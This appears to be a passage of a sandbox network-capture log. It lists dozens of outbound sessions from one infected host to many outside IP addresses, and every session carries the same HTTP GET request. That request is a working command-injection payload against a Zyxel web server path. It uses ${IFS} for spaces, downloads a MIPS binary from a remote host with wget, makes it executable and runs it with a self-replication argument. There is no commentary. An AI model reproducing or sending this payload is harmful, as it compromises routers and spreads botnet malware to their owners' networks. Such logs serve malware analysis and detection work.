                                        Jan 14, 2024 16:18:57.756424904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7975192.168.2.134121278.18.45.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756457090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7976192.168.2.1353998153.177.169.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756491899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7977192.168.2.133977224.219.87.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756531000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7978192.168.2.1344638197.103.25.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756573915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7979192.168.2.135033062.147.203.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756601095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7980192.168.2.135697864.131.255.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756642103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7981192.168.2.133276899.63.11.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756670952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7982192.168.2.133852078.146.115.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756702900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7983192.168.2.134554454.5.241.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756751060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7984192.168.2.133667468.153.120.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756803989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7985192.168.2.1337180138.125.96.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756831884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7986192.168.2.1357748116.80.56.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756890059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7987192.168.2.133512895.170.154.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756925106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7988192.168.2.1357930213.175.30.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.756975889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7989192.168.2.134846812.0.55.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757019997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7990192.168.2.1357024192.247.103.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757067919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7991192.168.2.1346346151.192.106.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757112980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7992192.168.2.1333018178.111.247.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757144928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7993192.168.2.134721013.61.223.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757170916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7994192.168.2.1351106172.55.192.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757208109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7995192.168.2.1348850178.150.61.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757256031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7996192.168.2.133604265.124.162.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757277012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7997192.168.2.1358530114.22.148.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757353067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7998192.168.2.1358686204.136.60.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757378101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7999192.168.2.136056031.156.162.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757436991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8000192.168.2.134699882.178.125.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757452011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8001192.168.2.135204859.54.82.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757498980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8002192.168.2.134814060.217.175.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757535934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8003192.168.2.134562042.46.196.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757591963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8004192.168.2.1347828110.92.247.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757611990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8005192.168.2.135033418.146.76.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757658958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8006192.168.2.135357251.4.89.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757698059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8007192.168.2.1339140190.62.136.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757739067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8008192.168.2.1346980149.30.211.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757783890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8009192.168.2.1358152145.168.37.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757817984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8010192.168.2.1338294184.179.206.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757882118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8011192.168.2.133884014.167.237.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757939100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8012192.168.2.1353520191.198.66.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.757973909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8013192.168.2.135180418.252.105.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758017063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8014192.168.2.135877061.214.91.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758053064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8015192.168.2.135531285.156.209.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758110046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8016192.168.2.1355376175.19.5.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758158922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8017192.168.2.1342126183.174.36.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758207083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8018192.168.2.1334614160.175.171.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758244038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8019192.168.2.1353560221.63.144.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758291006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8020192.168.2.134472254.157.23.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758315086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8021192.168.2.1342200196.128.249.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758373976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8022192.168.2.13469765.230.54.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758418083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8023192.168.2.1359486106.152.237.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758459091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8024192.168.2.1340908217.197.76.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758491993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8025192.168.2.135866844.173.210.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758533001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8026192.168.2.1350648178.32.149.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758584976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8027192.168.2.1339368108.136.99.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758609056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8028192.168.2.1353604176.186.157.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758641005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8029192.168.2.133501225.31.220.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758694887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8030192.168.2.1341592221.46.90.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758729935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8031192.168.2.134022864.106.167.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758780003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8032192.168.2.1351258145.189.10.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758793116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8033192.168.2.133747248.167.239.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758832932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8034192.168.2.1348542210.242.115.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758862972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8035192.168.2.133521218.136.139.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758903980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8036192.168.2.1346828204.124.86.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.758945942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8037192.168.2.1336388182.12.0.214443
                                        TimestampBytes transferredDirectionData
